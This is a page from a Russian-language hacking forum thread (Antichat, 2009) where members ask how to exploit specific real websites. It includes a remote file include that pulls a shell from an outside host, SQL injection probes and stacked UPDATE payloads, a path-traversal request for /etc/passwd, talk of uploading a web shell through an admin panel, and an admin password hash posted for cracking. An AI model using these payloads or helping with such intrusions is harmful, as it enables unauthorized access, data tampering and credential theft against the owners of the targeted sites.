HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2412 из 2422 « Первая < 14121912231223622402 2408 2409 2410 2411 2412 2413 2414 2415 2416 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос
  #1  
Старый 09.04.2009, 01:49
massovka
Познающий
Регистрация: 05.04.2009
Сообщений: 71
С нами: 9000055

Репутация: 5
По умолчанию Вопрос
Цитата:
Сообщение от xcedz  
угу, за неделю не спалили , а теперь спалят?
пробуй заюзать паблик сплоиты раз так срочно нужно.

Ну я попал в админку а там логи что и кто делает! Прочитал что нужно залить шел через смайлики но низнаю где скачать этот шел! Ну и еще куча вопросов! Может удели 5 минут начинающему?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 09.04.2009, 01:46
+StArT+
Познающий
Регистрация: 10.02.2007
Сообщений: 38
С нами: 10130311

Репутация: 183
По умолчанию
Цитата:
Сообщение от Imperou$  
Одного не могу понять...
Почему именно glaz.php%2500.gif ?? Откуда 25?
все просто "%25" = "%" в URL кодировке.
 
Ответить с цитированием

  #3  
Старый 04.05.2009, 00:50
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
С нами: 9326973

Репутация: -25
Question
Цитата:
Сообщение от [x59]ReV  
Читать
Воспринимать какую-н. письменную речь по ее внешним знакам, буквам и т. п. (произнося вслух или про себя, молча).Ч. буквы. Ч. слова. Ч. по…

Какое условие не выполнено???
Вообщета я по пыху проф а не по уязвимостям, знал бы не спросил! Учусь быстро! Там инклуд точно а значит к примеру с сайта http://site.ru/shell.php подставить к
http://wow.alania.net/?page=!

И получится http://wow.alania.net/?page=http://site.ru/shell.php

Я прав???

И обьясните плиз почему это не инъекция???

http://wow.alania.net/?page=guilds&id=-7'
Последний раз редактировалось geforce; 04.05.2009 в 00:55..
 
Ответить с цитированием

  #4  
Старый 10.05.2009, 23:21
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию
Цитата:
Сообщение от cr0w  
DimOnOID

А на твоем тестовом сервере register_globals включен?
ковырял я не тот php.ini) Вот в чём соль)
 
Ответить с цитированием

  #5  
Старый 11.05.2009, 16:04
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
С нами: 9035873

Репутация: 317
По умолчанию
Цитата:
Сообщение от AET  
сайт выдает такую ошибку
Microsoft VBScript runtime error '800a000d'

Type mismatch: '[string: "1' UNION SELECT 1 --"]'

/play/play.asp, line 31
Я и товарищь bug1z уже отвечали те на этот вопрос.... по моему даже очень доступно.
Или ты любиш биться головой о стену......
 
Ответить с цитированием

  #6  
Старый 22.05.2009, 02:54
slammer
Новичок
Регистрация: 02.05.2009
Сообщений: 11
С нами: 8962091

Репутация: 0
По умолчанию
http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=2'

это слепая инъекция?
 
Ответить с цитированием

  #7  
Старый 25.05.2009, 14:58
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию
Цитата:
Сообщение от _Quest_  
http://samovar.teaspoon.ru/?what=../../../../../../../../../../../../../../../ETC/PASSWD%00
Код:
You will die when I say You must die
WTF??
Мне кажется кто-то спалился. Бага была. теперь её нет
 
Ответить с цитированием

  #8  
Старый 29.05.2009, 11:16
farpost
Познающий
Регистрация: 16.05.2009
Сообщений: 42
С нами: 8941129

Репутация: 7
По умолчанию
Есть 2 вопроса:

1) Про внедрение в иньекцию UPDATE.

Пробовал на различных серваках так:

Цитата:
news.php?id=3+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8 ,9;+UPDATE+имя_табл+SET+колонка1=0x. ..+WHERE+колонка2=0x.../*
Если вывод ошибок не отключен, то пишет что ошибка в синтаксесе.

Цитата:
news.php?id=3;+UPDATE+имя_табл+SET+коло нка1=0x...+WHERE+колонка2=0x.../*
Тоже не срабатывает

Цитата:
news.php?id=3;/*
И даже такие запросы почему то не проходят.

Поясните пожалуйста. Я понимаю если бы писало нет привелегий. У кго ибудь получалось значения в таблицах менять? Буду очень рад примеру


2) Вопрос. Получил пароль админа

В таблице с юзерами есть поле salt но оно у всех пустое. Походу подсаливание не задействовано.

Цитата:
admin:a1wGqpFwp6D8M
Как то зашифрован.

Зарегал своего юзера

Цитата:
b95tOay72AuUU - в таком он виде лежит в таблице
MdD2hK - сам пароль
Как расшифровать????
 
Ответить с цитированием

  #9  
Старый 12.06.2009, 15:27
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами: 9428066

Репутация: 1668
По умолчанию
Дикс, прочитай внимательно https://forum.antichat.ru/showpost.php?p=1047515&postcount=72
 
Ответить с цитированием

  #10  
Старый 01.07.2009, 02:27
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами: 9851426

Репутация: 3908
По умолчанию
Цитата:
Сообщение от .:[melkiy]:.  
Скуля?
Код:
http://www.zhytomyr.ukrtelecom.ua/offers/webcams?id=61
нет
__________________
Feci, quod potui. Faciant meliora potentes.
 
Ответить с цитированием
Ответ
Страница 2412 из 2422 « Первая < 14121912231223622402 2408 2409 2410 2411 2412 2413 2414 2415 2416 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.